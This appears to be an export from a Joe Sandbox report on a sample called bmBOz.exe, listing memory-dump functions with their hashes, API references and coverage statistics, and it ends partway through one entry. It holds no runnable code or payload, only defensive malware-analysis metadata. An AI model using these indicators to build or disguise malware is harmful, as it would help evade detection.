Source File: 00000011.00000002.1629394915.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1060000_bmBOz.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 2065c87dcfca4ce3037ec1b002cd9cacdb222cff8d62c1fe9c8221ceb1c1b4a1
Instruction ID: c9cd2119927b134e87c2e336fb7b0076151fab47938a8e8a75d263b5a9a2629b
Opcode Fuzzy Hash: 2065c87dcfca4ce3037ec1b002cd9cacdb222cff8d62c1fe9c8221ceb1c1b4a1
Instruction Fuzzy Hash: B841BE71C00719CFEB24DFAAC884B9EBBF5BF49304F20806AD448AB255DB756945CF90

Function 0106E018 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0106E0A7

Memory Dump Source

Source File: 00000011.00000002.1629394915.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1060000_bmBOz.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f70ed78386be4414c59e8bcc6b268956bb9eed4613b6e1a8dd759c278c107b8f
Instruction ID: 087b6835791912f7da9756b261e49063acf2cd8430b6227cfd2f4a83cde58fa0
Opcode Fuzzy Hash: f70ed78386be4414c59e8bcc6b268956bb9eed4613b6e1a8dd759c278c107b8f
Instruction Fuzzy Hash: 1621F3B5900348EFDB10CFA9D884AEEFBF8FB48320F14811AE958A7250C375A944CF65

Function 0106E020 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0106E0A7

Memory Dump Source

Source File: 00000011.00000002.1629394915.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1060000_bmBOz.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 38a1c646466a0f4fda201c06b430b5f932a7a1de23d9f9c057731c898361ab24
Instruction ID: 3e1a5d934fd81a2ee7c9c97a550472888f7c3954ec0b84acbaeb1fcbc8d9cf03
Opcode Fuzzy Hash: 38a1c646466a0f4fda201c06b430b5f932a7a1de23d9f9c057731c898361ab24
Instruction Fuzzy Hash: A321E3B5900348DFDB10CF9AD584ADEBBF8EB48310F14801AE954A7350D379A944CF65

Function 0106BD40 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0106BDA6

Memory Dump Source

Source File: 00000011.00000002.1629394915.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1060000_bmBOz.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3284c684db843a4f821275d2c62aebd9d2ad944e9731ce84dc058eb9db8e159e
Instruction ID: a3f9b1f5d993a8f43d30cf57a5c391e81146a732909d066f57e473d741eab446
Opcode Fuzzy Hash: 3284c684db843a4f821275d2c62aebd9d2ad944e9731ce84dc058eb9db8e159e
Instruction Fuzzy Hash: 9A1110B6D002498FDB20DF9AC444BDEFBF8EF88310F14842AD959AB610D379A545CFA1

Function 055532F0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 05553355

Memory Dump Source

Source File: 00000011.00000002.1636319917.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5550000_bmBOz.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: e951ae3277680af163dab07cbb6acba9ba6da6ada172fc6fe409463b732c16e4
Instruction ID: 0991f551df40107331464269e3e64c76220cd04fa917af61beb3d69b7a2d9988
Opcode Fuzzy Hash: e951ae3277680af163dab07cbb6acba9ba6da6ada172fc6fe409463b732c16e4
Instruction Fuzzy Hash: 1C11F2B68003489FDB20CF9AC885BDEBBF8FB48320F15841AE918A7600D375A544CFA5

Function 055532F8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 05553355

Memory Dump Source

Source File: 00000011.00000002.1636319917.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5550000_bmBOz.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: fa28c7b7799ebc744bb3f735c3b75c322ce21edbcaba855a5d07d47b26a03a66
Instruction ID: a1b5c8628ce583f340e08126016daf3c0125a829e2006cdeda9e8fbc16c539e1
Opcode Fuzzy Hash: fa28c7b7799ebc744bb3f735c3b75c322ce21edbcaba855a5d07d47b26a03a66
Instruction Fuzzy Hash: 3D11F2B58002489FDB10CF9AC484BDEBBF8FB48320F11841AE918A7600C375A544CFA5

Function 00F9D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1628576366.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_f9d000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 698e440f925ecca2fd6c80ddc830a8f2495f239556650161536d3f6b5007642b
Instruction ID: 665b5825234245b27e38089064d5bd2100b04a2ea3f521f846f58487643d7bf8
Opcode Fuzzy Hash: 698e440f925ecca2fd6c80ddc830a8f2495f239556650161536d3f6b5007642b
Instruction Fuzzy Hash: D021F872904204DFEF15DF18D9C0B26BB65FB94324F34C56DE9090F256C336E856DAA2

Function 00FAD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1628744219.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_fad000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0e95730550909d21c9b284606efa8ff40456bd42e81eb8ab2dff7c1211c7aca
Instruction ID: bb0cc77950540863731068a2f90b27483f9f4da4f5bc139033f879d6b60e420f
Opcode Fuzzy Hash: e0e95730550909d21c9b284606efa8ff40456bd42e81eb8ab2dff7c1211c7aca
Instruction Fuzzy Hash: 4F21D3B6904200DFDB14DF24D984B16BB65EB85324F20C56DE80A4B69AC336D847DA62

Function 00FAD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1628744219.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_fad000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bd814361e16c1372da6f214cc034c2ae7e123b9b08972bda87b5c892a2f53d9
Instruction ID: bede9f93fb12fbc1e850d9e56d95de8cf59d5e671db762822ba7fc89ce6a0ca6
Opcode Fuzzy Hash: 3bd814361e16c1372da6f214cc034c2ae7e123b9b08972bda87b5c892a2f53d9
Instruction Fuzzy Hash: 632126B2904304EFDB15DF24D9C0B26BBA5FB85324F20C56DE80B4F692C336D846DA62

Function 00FAD005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1628744219.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_fad000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dfb8c72b7e87efcd5c14bfb6096972eb32000816220d3b3460247cd891e2d70
Instruction ID: b3a591f58d344e136f33fb78cb793d0accf43692bb4e3f4a2e153ac514356bcd
Opcode Fuzzy Hash: 4dfb8c72b7e87efcd5c14bfb6096972eb32000816220d3b3460247cd891e2d70
Instruction Fuzzy Hash: 5B2180755093809FCB12CF20D990715BF71EB46314F28C5EAD8498F6A7C33A980ACB62

Function 00F9D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1628576366.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_f9d000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction ID: 7cba07786867156d38ed7539cfc0485e20ba0bf62776955273c96c553ac8c641
Opcode Fuzzy Hash: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction Fuzzy Hash: 6611DFB2804240DFDF15CF04D5C0B16BF71FB94324F24C6A9D9090B656C33AE856DBA2

Function 00FAD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1628744219.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_fad000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction ID: 376c92b69a6de41043bb3684ec38906d02150287843909eba2a726a9538fa696
Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction Fuzzy Hash: 72118EB5904240DFDB15CF10D5C4B15FBB1FB85324F24C6A9D84A4BAA6C33AD84ADB51

Function 00F9D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1628576366.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_f9d000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dafca787b225abc2e4e36eb29138e60dd23be43f0ded1b4cad7f5445bfe315c9
Instruction ID: 307f2f1a261fa00ad2e6a015bdf60a5dd7cc41407b94d1b832c050684d77c869
Opcode Fuzzy Hash: dafca787b225abc2e4e36eb29138e60dd23be43f0ded1b4cad7f5445bfe315c9
Instruction Fuzzy Hash: A401F732404340AAFF204EA5CD84B66BB98DF41334F28851AED090F282D2399840DAB3

Function 00F9D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1628576366.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_f9d000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6976b2b920080d544760e18a77fdcebb65291d87860b6e11b3e02e4843c87635
Instruction ID: e2681d6b4b076711c9d80d40e0a8a348c31d4ae256669bd2a8466d46c03a32d7
Opcode Fuzzy Hash: 6976b2b920080d544760e18a77fdcebb65291d87860b6e11b3e02e4843c87635
Instruction Fuzzy Hash: 94F0C231405340AEFB248E15C888B66FF98EB51734F28C05AED080F286C2799844CAB2

Analysis Process: bmBOz.exePID: 4564, Parent PID: 5528COMMON

Execution Graph

Execution Coverage:	11.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 0312C0F8 Relevance: 3.1, Instructions: 3120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a6894ec07362f751859dfa50803494c83db83ceb60a1f2e7c013690ec4af70b
Instruction ID: 53abfa353c11bb48667c8f014a7350cb45cbb7c2472b796ce965014f89caa9d8
Opcode Fuzzy Hash: 8a6894ec07362f751859dfa50803494c83db83ceb60a1f2e7c013690ec4af70b
Instruction Fuzzy Hash: 32630C31D10B198ADB11EF68C8806A9F7B1FF99300F55C69AE45877121FB70AAD5CF81

Function 0312B900 Relevance: .7, Instructions: 658COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0d5742aaa73602c1aa4d7a76844f03faaeac673372269700674111610250e3e
Instruction ID: dd606e18a3f72a47236d6e4df01f5668ec53c5702b03ab8f36dff0ab06cb3295
Opcode Fuzzy Hash: a0d5742aaa73602c1aa4d7a76844f03faaeac673372269700674111610250e3e
Instruction Fuzzy Hash: 3E329D34A042198FDB14DB68D894BAEBBF6FF88310F148569E509DB395DB31DC52CB90

Function 0312F488 Relevance: .4, Instructions: 360COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d52e78bf1aaafe4bbc812b0ee5d53e92ab1800912ae95958ed0d29854dfb92e
Instruction ID: 9ad72e3877b94e06970c52c367a3c731936f4c8a4f632b0216528ca827ccbd8f
Opcode Fuzzy Hash: 2d52e78bf1aaafe4bbc812b0ee5d53e92ab1800912ae95958ed0d29854dfb92e
Instruction Fuzzy Hash: C7C1D071B003269FDB15DB68C890B2EBBBAFB89310F1585A9D505CB395DB34EC92C790

Function 031245B8 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edfc7f5861e119c40a7bc37997589c8d099aad4991d26cda85de0731609bb47e
Instruction ID: fa9bd5b45bcf5a2d3e9fe5aaeeb59b7d5a043e7cef9140d96a61f92925a9ba05
Opcode Fuzzy Hash: edfc7f5861e119c40a7bc37997589c8d099aad4991d26cda85de0731609bb47e
Instruction Fuzzy Hash: D1B14E70E00659DFDF14CFAAC88579DBFF2AF8C314F188129D815AB294EB749855CB81

Function 03124E88 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac2714017dbe6c6c18a4be6a149bbe8e323e4f338e3f20f6658da5dda073dcb2
Instruction ID: b93dc11e27963877854dedf9104bca914068d9f60b8f546ecad14aa522a58bde
Opcode Fuzzy Hash: ac2714017dbe6c6c18a4be6a149bbe8e323e4f338e3f20f6658da5dda073dcb2
Instruction Fuzzy Hash: 49B16F70E003199FDB14CFA9D8817ADFFF2AF8D314F188129E815AB294EB759855CB81

Function 03124270 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 643e026833a3363c43bc4ce693bbee686e50736ed8988df89c4af3b990544227
Instruction ID: a74871dbef14001434422c040581a8282da14b909e80ceadbb1ea4ad352e78d7
Opcode Fuzzy Hash: 643e026833a3363c43bc4ce693bbee686e50736ed8988df89c4af3b990544227
Instruction Fuzzy Hash: 7C916070E002699FDF14CFAAD985B9DBFF2AF88314F188129D405AB294EF749855CB81

Function 07578078 Relevance: 1.6, APIs: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 075780E7

Memory Dump Source

Source File: 00000014.00000002.3950078767.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7570000_bmBOz.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 92b27afddaea1aed2bbc1535c5cacb6b3bdc174dc7719060b7ed744897f9bef1
Instruction ID: 8e61515a6f3f9c8876599ffab2c46431b1d841fc93b0d17ce9b6167ccad20fe9
Opcode Fuzzy Hash: 92b27afddaea1aed2bbc1535c5cacb6b3bdc174dc7719060b7ed744897f9bef1
Instruction Fuzzy Hash: E61106B2C0065A9FDB10CF9AD445BDEFBF4EB48220F14812AD818A7641D779A941CFE5

Function 075768E8 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 075780E7

Memory Dump Source

Source File: 00000014.00000002.3950078767.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7570000_bmBOz.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: fe80e4038266332bfc080bd385700cc4bb64f3287fb96c49c721e81c3a046e4e
Instruction ID: b5704659121bac988fe1850453297372c8f9340ec8fd27c64e50b348fe8f8c5d
Opcode Fuzzy Hash: fe80e4038266332bfc080bd385700cc4bb64f3287fb96c49c721e81c3a046e4e
Instruction Fuzzy Hash: 051103B1C1065A9FDB20DF9AD444BDEFBF4FB48220F14812AE818A7240D778A944CFA5

Function 01510E90 Relevance: 1.5, Strings: 1, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_, xrefs: 01510F9C

Memory Dump Source

Source File: 00000014.00000002.3908853593.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1510000_bmBOz.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 38816a77eaeb61af4076197288b408a082aa41b5663b596a0e76c1ae6b680cf4
Instruction ID: 6a98b86acb3626848875770f158fd47565ce2983aac2e66eb510f5e756649c82
Opcode Fuzzy Hash: 38816a77eaeb61af4076197288b408a082aa41b5663b596a0e76c1ae6b680cf4
Instruction Fuzzy Hash: 77718C31D007498FDB11DFA9D884AEEFBF1FF49310F10896AE555AB251E734A984CB90

Function 0312730F Relevance: 1.4, Strings: 1, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LRq, xrefs: 03127346

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID: LRq
API String ID: 0-3187445251
Opcode ID: 2b49f26cf061fb81cdad39296514d9df916bdf26ba9c0340feab7ab71025e16f
Instruction ID: b9d7170e7af3bd24766106326955548269ed395dfb1305adc24f219a5a5641f7
Opcode Fuzzy Hash: 2b49f26cf061fb81cdad39296514d9df916bdf26ba9c0340feab7ab71025e16f
Instruction Fuzzy Hash: 66614934B102258FDB18DB78C458AAE7BF6EF8D700F1444A9E406EB3A2DB759C45CB91

Function 03128B30 Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

LRq, xrefs: 03128B62

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID: LRq
API String ID: 0-3187445251
Opcode ID: 725016dae20375a464d1e4662e84ef2fe4e285b2c5aa3429531eec221a7ef7b6
Instruction ID: 655dcf52f7cb04a8b411e5a8ba19b87ba7288bb04e6671836baa7b9cdb519594
Opcode Fuzzy Hash: 725016dae20375a464d1e4662e84ef2fe4e285b2c5aa3429531eec221a7ef7b6
Instruction Fuzzy Hash: A4316F70E102198BEB18DF69C4547DEBBB6EF49310F648569F412EB240EB70A991CB50

Function 03128B1F Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

LRq, xrefs: 03128B62

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID: LRq
API String ID: 0-3187445251
Opcode ID: 19d4c7f417974f231300c535444f403b216f463f5d6fed0b23852473e55fc4ce
Instruction ID: a278389cdf8615c196ed3617dc97b1303caba56e88da2031de87b15f86b8f771
Opcode Fuzzy Hash: 19d4c7f417974f231300c535444f403b216f463f5d6fed0b23852473e55fc4ce
Instruction Fuzzy Hash: 91315A70E102198BEB18CF78C85479EBBB6EF49300F648569E812FB240EB709952CB50

Function 031285A8 Relevance: 1.3, Strings: 1, Instructions: 91COMMON

Download Yara Rule

Strings

4'q, xrefs: 031285C0

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: ec10dc0b1123c639284fcf0cb01a1f51bb0e3f22f3992b1bd1628d80a66378e4
Instruction ID: 7d621d756dd06cc447bebe76535931f1e23e4cef91d8a0be8b27585f59d2d031
Opcode Fuzzy Hash: ec10dc0b1123c639284fcf0cb01a1f51bb0e3f22f3992b1bd1628d80a66378e4
Instruction Fuzzy Hash: 70318F31A007069FD769EB39D894AAE7BA3FFC5204755C92CD05A9F290DF30E816CB91

Function 03126FD8 Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

LRq, xrefs: 0312700F

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID: LRq
API String ID: 0-3187445251
Opcode ID: 79fa8b4b4f640f634aeeaf9c74580b337b6b811580e45fc9cac197b68cd1778f
Instruction ID: e922b1506e44ba50803c8de3d78473e3c77fb47438dd10c64cea95c228aefb1c
Opcode Fuzzy Hash: 79fa8b4b4f640f634aeeaf9c74580b337b6b811580e45fc9cac197b68cd1778f
Instruction Fuzzy Hash: 8B1191316082944FC715DB78841466E7FB2FFCA300B1484EED055CF296DB75A8468B92

Function 031294F1 Relevance: .7, Instructions: 652COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83e9e242b7114d14c81cb0a8f26d2bf45a774651283a60c76f1dd5dbe3faa96f
Instruction ID: d83d7695611052e71a3459b9f966c7fffb8940ddc41fb3d36178db3a80677879
Opcode Fuzzy Hash: 83e9e242b7114d14c81cb0a8f26d2bf45a774651283a60c76f1dd5dbe3faa96f
Instruction Fuzzy Hash: 82327A38B202158BEB59EB78906967E3AE7FBCA241F64493DE00ACB350DF319C539751

Function 03129500 Relevance: .6, Instructions: 648COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10fc59dde234e8009bc95d8765431515c8f00dd2af85d54e5ebf11d4373978f1
Instruction ID: 018e8b96c34b78b4cfc2103c6efdb9b88fe59ccdbc8323c808b77eea7b6943df
Opcode Fuzzy Hash: 10fc59dde234e8009bc95d8765431515c8f00dd2af85d54e5ebf11d4373978f1
Instruction Fuzzy Hash: 80326B38B102158BEB59EB78906567E3AE7FBCA241F64493DE006CB350DF319C539751

Function 031294C8 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bc04148addd66de41adab446ebb8a0371bc88a58fa6014ae4cb627827c8d0ad
Instruction ID: 26855ee4f53186b37befcfd26cbb8a2aafcfc79ede07867283ac194670d6db90
Opcode Fuzzy Hash: 2bc04148addd66de41adab446ebb8a0371bc88a58fa6014ae4cb627827c8d0ad
Instruction Fuzzy Hash: D1226A38B102158BEB69EB78906527D3AE7FBCA241F64493DE00ACB350DF319C539751

Function 03121490 Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d778b667269a073b023c8b0a07ace2ca64fc55bb4ea24df831b503687a371e9
Instruction ID: 8d35482f1b151fc8e3014e1ac24f85f5aa0025cd4ca727ba83e7a4b5b8816ef0
Opcode Fuzzy Hash: 3d778b667269a073b023c8b0a07ace2ca64fc55bb4ea24df831b503687a371e9
Instruction Fuzzy Hash: 14C18F30A002699FDF24CB6CD4807ADBFB6EB4E310F6889BAD405DB255D738D991CB91

Function 031245AE Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64ac99407647b7888109fc42875604c86a2b0b05fa52038d902ede17c95ade0e
Instruction ID: 3ec6b8ba260b275d0c2651f4aab51aae745ef46cda7a86c94299a9f3b2e96be3
Opcode Fuzzy Hash: 64ac99407647b7888109fc42875604c86a2b0b05fa52038d902ede17c95ade0e
Instruction Fuzzy Hash: A3B15E70E00669CFDB14CFAAC885B9DBFF1BF4C304F188129D815AB294EB749855CB81

Function 03124E7E Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed50f9d2d72940e087c02c02b76955c51912500ef75b12853b68bb139fd5bdb
Instruction ID: 3b2da98f341aff5297f63cc50b21620d7a6651f342265e10a41437514c0de535
Opcode Fuzzy Hash: fed50f9d2d72940e087c02c02b76955c51912500ef75b12853b68bb139fd5bdb
Instruction Fuzzy Hash: 78B15070E002199FDB14CFA9D8857ADFFF2BF8D314F188129D815AB294EB749855CB81

Function 0312B8ED Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de80256d2d3239d7d4664443cae6766184b39feb26408974bf0fd9636edececd
Instruction ID: d8ff00ea880b42141bbd9b25b76471a7fabf7a6c991ab85c212c4f7f59374e9e
Opcode Fuzzy Hash: de80256d2d3239d7d4664443cae6766184b39feb26408974bf0fd9636edececd
Instruction Fuzzy Hash: 72913D74A042189FDB14DB68D594BADBBF6FF88310F188569E406EB354DB30EC52CB50

Function 03124264 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c23eebda0a7ddddce28956da83ef5399918c483dcc8cf775b1896997710efec
Instruction ID: d071bfe508af073172805754475295f50dfe66bb7fe5f16c8b50377c2d1a937f
